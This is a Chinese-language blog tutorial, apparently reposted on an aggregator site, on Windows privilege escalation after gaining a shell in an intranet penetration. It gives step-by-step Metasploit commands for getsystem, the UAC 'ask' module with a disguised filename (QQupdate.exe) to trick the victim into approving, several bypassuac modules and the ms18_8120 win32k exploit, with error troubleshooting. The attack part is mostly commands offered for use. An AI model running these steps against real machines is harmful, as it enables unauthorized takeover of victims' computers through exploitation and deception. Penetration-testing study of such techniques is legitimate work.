我的内网渗透-提权大法

这篇具有很好参考价值的文章主要介绍了我的内网渗透-提权大法。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

拿到shell之后乱码解决

chcp 65001
#将编码设置为UTF-8的编码

 出现这个提示就是切换成功,后面也是可以正常显示的

我的内网渗透-提权大法

提权

方法一:

新版本的kali直接getsystem,可以提权成功(有时候可以,有时候不可以)

meterpreter > getsystem

提权成功

我的内网渗透-提权大法

方法二:

利用uac(用户账户控制)进行提权。

用户账户控制在涉及管理员权限的时候会提示你是否要这么做,确定的话就是以管理员的身份去运行如果把他拉到从不通知,在涉及需要使用管理员权限的时候就会直接以管理员的身份去运行。

我的内网渗透-提权大法

利用uac提权有两种情况

①关闭了通知。在这种情况下,就不需要目标主机进行确认,可以直接提权成功

②开启着通知(默认是开启的,除非手动关闭)。这种情况就需要目标主机去确认,才能进行提权成功。

use exploit/windows/local/ask 
#使用windows的ask模块进行提权
search uac
#或者直接搜寻uac模块,找到ask也可以

msf6 exploit(windows/local/ask) > options
#进入模块后直接options查看需要进行哪一些配置

msf6 exploit(windows/local/ask) > set session 1
#设置我们要进行提权的会话

msf6 exploit(windows/local/ask) > set lport 5555
#这边的端口设置是随意的,不用跟session 1的端口一致


msf6 exploit(windows/local/ask) > set filename QQupdate.exe
#设置在目标主机uac弹出的名字,可以更改成一些比较可信的名称
#这里有一个要特别注意的点是需要在修改的文件名后面加上exe,不然在kali中攻击过程没显示报错,但是在目标主机中是弹不出uac窗口的

unset filename(或者其他配置名字)
#进行设置重置

msf6 exploit(windows/local/ask) > set technique PSH
#将设置成windows处理程序,可信度更高(原本是exe)

meterpreter > getsystem
#在目标主机确认之后会重新进入meterpreter模块,然后就可以获取计算机的管理权限

提权所生成的文件在目标主机的 C:\Users\ADMINI~1\AppData\Local\Temp

我的内网渗透-提权大法

方法三:

利用bypassuac进行提权。

bypassuac这个是属于内核漏洞,有打补丁的话是不一定能成功的。

这些模块不一定每一个都可以使用,有一些是你系统不存在漏洞,有一些是你系统打了补丁

我的内网渗透-提权大法

search bypassuac
#寻找可以绕过uac的脚本模块

msf6 exploit(windows/local/bypassuac_eventvwr) > use 0
#选择使用的模块,或者直接跟上模块的名称

msf6 exploit(windows/local/bypassuac_windows_store_filesys) > options
#查看一下使用模块的配置,一般只需要设置会话

msf6 exploit(windows/local/bypassuac_windows_store_filesys) > set session 1
#设置要进行提权的会话

msf6 exploit(windows/local/bypassuac_windows_store_filesys) > run
#直接运行等待结果


报错

1. payload的设置。

[-] Exploit aborted due to failure: bad-config: The payload should use the same architecture as the target。

如果存在这样的问题,那么就需要更改下payload,需要和你之前会话的payload配置保持相同。  

2.[-] Exploit aborted due to failure: no-target: Session and Target arch must match
如果存在这样的报错就是存在windows的位数问题,他后面显示是X86的,我们之前用的是x64的payload。
在用msfvenom生成木马的时候可以不加x64进行木马生成,默认就是生成32位的程序。这样子就不会存在这种报错,不过这样子生成的程序容易存在兼容性问题,在主机中可能会直接进行提示兼容性问题,或者停止程序的运行

Exploit target:

   Id  Name
   --  ----
   0   Windows x86

方法四:

此方法适用于攻击服务器,windows主机很难实现文章来源地址https://www.toymoban.com/news/detail-481002.html

msf6 exploit(windows/local/bypassuac_eventvwr) > search ms18_8120_win
#查找漏洞

msf6 exploit(windows/local/ms18_8120_win32k_privesc) > options
#查看一下要进行设置的配置

msf6 exploit(windows/local/ms18_8120_win32k_privesc) > set session 1
#设置要使用的会话

msf6 exploit(windows/local/ms18_8120_win32k_privesc) > run
#开始攻击

run -j 
#后台运行

jobs
#查看监听(是否建立了会话)

到了这里,关于我的内网渗透-提权大法的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 网访问内网机器:基于frp的内网穿透

    因为经常需要远程访问自己的机器,所以写一个博客记录一下 从公网中访问自己的私有设备向来是一件难事儿。 A. 计算机网络 如何在自己的机器上访问另外一台机器?一台机器本身是一个独立的整体,可以直接访问本身所存储的文件。而如果现在有两台机器的话,机器A想要

    2024年02月16日
    浏览(28)
  • 私有GitLab的内网搭建与维护

            摘要:由于有私有代码保密和开发代码托管需求,将在部门内部网络(与互联网不联通)搭建GitLab代码托管服务器。本次的部署步骤主要是,第一,下载好离线的GitLab安装包和依赖包;第二,部署gitlab到Linux服务器中;第三,调整gitlab配置文件。 目录  一、下载

    2024年02月11日
    浏览(34)
  • 几款实用的内网穿透工具

    本文以渗透的视角,总结几种个人常用的内网穿透,内网代理工具,介绍其简单原理和使用方法。 nps是一款轻量级、高性能、功能强大的内网穿透代理服务器。目前支持tcp、udp流量转发,可支持任何tcp、udp上层协议(访问内网网站、本地支付接口调试、ssh访问、远程桌面,内

    2024年02月05日
    浏览(23)
  • 免费开源的内网穿透工具-FRP安装与配置

      FRP是一款内网穿透工具,首先要一台带公网IP的服务器用作服务端(Linux),需要被穿透的内网服务器作为客户端   FRP的Github地址   下载FRP:    FRPS服务端的安装:   需要有一台具备公网IP的机器或云服务器,我用的是阿里云服务器,具有公网IP的机器(云服务

    2024年02月12日
    浏览(30)
  • 利用frp搭建自己的内网穿透服务器

    本教程基于以下环境完成 带有公网IP的云服务器一台,安装centos7.6系统 一个属于自己的域名,可以是二级域名 域名对应的证书文件 一台64位Windows系统的电脑 开源项目frp 证书文件主要是用来配置https访问的,如果没有证书文件可以参考我的这篇文章生成 centos7中申请Let‘s E

    2024年02月02日
    浏览(43)
  • 常见的内网穿透工具有 ngrok/ localtunnel/ frp

    内网穿透工具的工作原理是通过在本地网络和公共网络之间建立一个通道,将公网流量转发到本地网络中的服务。这样, 在没有公网 IP 或无法直接访问的情况下,用户可以通过公网访问本地网络中的服务。 介绍:ngrok 是一个强大且易于使用的内网穿透工具,支持多种协议和

    2024年02月07日
    浏览(26)
  • 『FastTunnel』荣获GVP的开源内网穿透工具,动手搭建属于自己的内网穿透平台

    👑 可能感兴趣 🚀『可道云』内网穿透牛刀小试,会敲键盘就能搭建的私有云网盘 📣读完这篇文章里你能收获到 全程无坑!!动手搭建属于自己的内网穿透平台 了解内网穿透的概念以及认识开源工具FastTunnel 不通过第三方工具即可直接远程自己家里或者公司的电脑 对于大

    2024年02月05日
    浏览(26)
  • 内网穿透-Frp(1)使用樱花Frp(Sakura Frp)进行免费的内网穿透操作步骤

    背景介绍:因需要在4G路由器(openwrt,mips架构)上提高页面和视频流展示,需要在公网能访问的,问题:4G卡不能固定IP,所以没办法使用公网+端口映射方式进行;故采取内网穿透frp方式进行公网访问,frp需要跳板机(server端);樱花支持mips架构;经测试成功;故记录供学习参考

    2024年02月05日
    浏览(30)
  • B-3:Linux 系统渗透提权

    任务环境说明: 服务器场景:Server2204(关闭链接) 用户名:hacker 密码:123456 1.使用渗透机对服务器信息收集,并将服务器中 SSH 服务端口号作为 flag 提 交; Flag:2283/tcp 2.使用渗透机对服务器信息收集,并将服务器中主机名称作为 flag 提交; Flag:KipZ1eze 3.使用渗透机对服务

    2024年02月08日
    浏览(33)
  • 软件测试拿到项目之后该怎么做?请仔细看完这篇文章

    学习软件测试最关键的就是项目实战,如果说我们单纯的学了很多的软件测试理论基础或者很多工具和技术的话,但是没有项目实战去演练,那么面试还是被淘汰。 为了解决大家这样的问题,我搭建在自己的阿里云服务器上,其实就和你们企业自己部署在你们自己服务器上完

    2024年02月14日
    浏览(35)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包